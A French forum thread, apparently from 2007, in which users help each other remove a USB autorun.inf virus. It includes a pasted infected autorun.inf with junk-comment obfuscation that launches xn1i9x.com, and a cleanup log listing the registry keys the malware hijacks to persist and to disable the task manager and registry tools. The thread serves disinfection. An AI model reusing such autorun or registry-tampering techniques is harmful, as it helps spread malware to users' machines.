Merci pour ton aide mais j'ai essayé ce que tu m'as dit de faire mais ça na rien changé!!

Bonjour,

voici un dossier surce virus

http://blog.abuse.ma/?p=45

je me suis desinfecté :

1-scanner avec un bon antivirus a jour
2-utiliser autofix.exe present sur le site

Tout est enfin redevenu normal !

Salut Hitchum

Je crois que Thugsta s est perdu en chemin, je vais aller voir ton lien ;-)

Regarde ici cela devrait t interresser

A lire et a appliquer par la suite Vaccination des clefs usb http://forum.zebulon.fr/index.php?showtopic=131959

Merci a Gof

Salut.

Merci pour votre aide......j'ai réussi a me débarasser du virus...le message d'erreur n'apparait plus au démarage!!!!

Bonsoir Thungsta

As tu été voir le lien que j'ai mentionné --> Desactivation autorun par défaut dans Windows et vaccination des clefs usb ?

http://forum.zebulon.fr/index.php?showtopic=131959

Merci a Gof

Bonjour thugsta, quelle méthode de choc as tu appliqué à ton virus afin de t'en débarrasser stp, j'en ai chopé un aussi par les PC de ma fac... :S Merci!!!

[13/12/2007 22:16:22] - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion­\Run ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ==> réparé
[13/12/2007 22:16:22] - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ==> réparé
[13/12/2007 22:16:22] - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NofolderOptions ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden ==> réparé
[13/12/2007 22:16:22] - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun ==> réparé
[13/12/2007 22:16:22] - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Explorer ==> réparé
[13/12/2007 22:16:22] - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions ==> réparé
[13/12/2007 22:16:23] - HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig ==> réparé
[13/12/2007 22:16:23] - HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR ==> réparé

Bonjour toff

Ni bonjour, ni explications ... et le tout sur un sujet que tu n'as pas ouvert toi meme ... :-(

...

Salut,

j'ai été infecté par ce virus. Et j'ai suivi les étapes que vous avez indiqués. Merci beaucoup pour les indications. J'ai refait un 2ieme scan et c bon j'ai pas trouvé de virus.
Mais j'ai edité le fichier autorun.inf et voila ce que j'ai trouvé :
*************************************************
Voici le contenu de mon fichier autorun.inf

;ZlDL51ko03skAwc7ajo21jssa04f5LKDf3S438IK0we03D2f323wra23dlw­SrDKL40js42Hdi7
[AutoRun]
;aZi2i9kwAdjawf4jwaL27Sj2fdK9lw1KpookJ8asHcelksamje3a252AkLJ­D63ri2w30q3S3Joqs0KaUKI7k0lpawc4kalail21DqD531LJkiasikOql0r4­
open=xn1i9x.com
;klAowsrk0q3aJnd2i2rw430JawkKK
shell\open\Command=xn1i9x.com
;kej2r5dis9sakdkm0XDJnLe7oqpa4irff2oD1KD43k494L1icDCddqp3S22­2jL2K0edks3iIK1K0Asa5w5lodwJakDLLHf
shell\open\Default=1
;sAsl414ad1Ks8sIa4Lp9Awlf7w2lSr3Kar1odfieaili3aq3LDk3nFSod49­2322Lw0D3DKafos8ao30wwJlwacjekkaar4d7kdsDjAr0k4e5Dki2o1q4i
shell\explore\Command=xn1i9x.com
;aFkdLfa1Llsek32Jd0okODswria7ielp3KiDewsALJJs2qLj3lka01r94sa­lai0ajr5cDsZ2iK4jwD3kLaokKDwk3HK053A44nl
************************************************

il me parait trés bizarre.
Est ce que vous pouvez m'aider?

--titi27

Slt thugsta j'ai un le mm blem avec autorun.inf et je vais essaie c ke tu dit sauf ke je n'arrive pa a telecharger simatec.com et flash desinfector alors keske je dois faire au juste merci d'avance ok A+

Aller à "demarer" puis lancer exécuter et taper cmd puis selectionner l'emplacement du virus puis taper "erase /AH /F autorun.inf".... c'est trés efficace..............

Bonjour tout le monde

A noter que Thugsta etait le demandeur dans ce sujet, c'est moi qui lui est donné la conduite a tenir ;-) lol

Vinagny, essaye d'éxécuter soi

le poste 1 http://www.commentcamarche.net/forum/affich 3718653 virus j autorun inf#1

ou le poste 3 http://www.commentcamarche.net/forum/affich 3718653 virus j autorun inf#3

Le lien de flashdésinfector était "brisé", cela n'est plus tu peux maintenat le télécharger sans problème.

Voili, voila. Tiens au courant.

Bjr tout le monde,,
je suis entrain de suivre les etapes pour me débarrasser d autorun.inf,, mais ce que je veux savoir,, esq on peut le supprimer par une commande dos,, dans le mode sans echec,..?? quelqu'un ma parler de ça mais je ne sais ps si c possible ou pas,,, ..ciao

Met votre antivirus a jours

Comment détruire zhengbo. qui ce trouve dans autour.inf
merci de m'avoir aider

Bonjour Moh

Il serait plus que préférable que tu crées ton propre sujet.
Cela rendra le poste (ici) plus compréhensible, et nous pourrons traiter ton soucis avec plus d’efficacité.
Pour t'y aider, regarde ici :
http://perso.orange.fr/rginformatique/section%20virus/demofa­iresontmessage.htm
http://pagesperso-orange.fr/rginformatique/section%20virus/d­emofairesontmessage.htm

http://www.technicland.com/malpolitus.swf

Salut.

J'avais le même problème avec les virus issas.exe et autorun.inf. je suis parvenu à les supprimer en utilisant le logiciel "trojan remover" version essai 30 jours.
Téléchargeable ici Trojan Remover
Scanner votre PC .Après détection,choississez l'option (en anglais) qui vous propose de les supprimer en les renommant (option recommandée).enfin redémarrer.c'est simple et ça marche.